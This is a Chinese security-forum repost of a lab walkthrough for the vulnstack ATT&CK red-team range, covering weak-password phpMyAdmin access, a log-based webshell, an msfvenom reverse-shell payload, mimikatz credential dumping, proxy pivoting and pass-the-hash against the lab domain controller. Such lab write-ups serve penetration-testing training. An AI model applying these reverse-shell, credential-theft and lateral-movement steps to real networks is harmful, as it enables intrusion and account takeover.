安全矩阵

 找回密码
 立即注册
搜索
查看: 2682|回复: 0

ATT&CK红队实战靶场初探(一)

[复制链接]

221

主题

233

帖子

792

积分

高级会员

Rank: 4

积分
792
发表于 2021-7-31 21:16:46 | 显示全部楼层 |阅读模式
ATT&CK红队实战靶场初探(一)[url=]F12sec[/url] 今天
以下文章来源于广软NSDA安全团队 ,作者青丝未散

广软NSDA安全团队
技术分享,感谢关注
一、环境配置
靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2

攻击示意图:


靶机统一使用虚拟机搭建

web服务器:windows7 ip:192.168.52.143/192.168.154.152

域成员:windows server 2003 ip:192.168.52.141

域控:windows server 2008 ip:192.168.52.138

攻击机:kali ip:192.168.154.146

二、外网打点
nmap扫描ip,看一下开了哪些端口



开了80和3306,访问80

是个探针,知道网站路径和php版本信息

上dirsearch扫一下目录

有phpMyAdmin

试下弱口令,root/root进去了

然后就是getshell,这里参考:https://cloud.tencent.com/developer/article/1540506,用的是日志getshell




写完shell蚁剑连上去,成功getshell


三、内网渗透
1、用msf生成exe上线,联动cs
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.154.146 LPORT=4444 -f exe -o shell.exe

msf设置



通过蚁剑上传木马,执行

成功得到session


打开cs,设置监听器

在msf中使用exploit/windows/local/payload_inject模块,session设置为刚获得的session

set payload windows/meterpreter/reverse_http


执行,cs成功上线
2、信息收集
(1)mimikatz提取账号明文密码


(2)post/windows/gather/enum_applications模块获取软件列表






(3)get_local_subnets获取子网信息+内网流量转发(msf+proxychains)




获得内网网段为192.168.52.0/24

run autoroute -s 192.168.52.0/24

添加路由让msf可以扫描网段



msf运行socks4a模块,并且修改/etc/proxychains.conf的最后一行为相对应的代理端口





(4)arp扫描内网存活主机

(5)PTH攻击拿下域控



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 10:31 , Processed in 0.015591 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表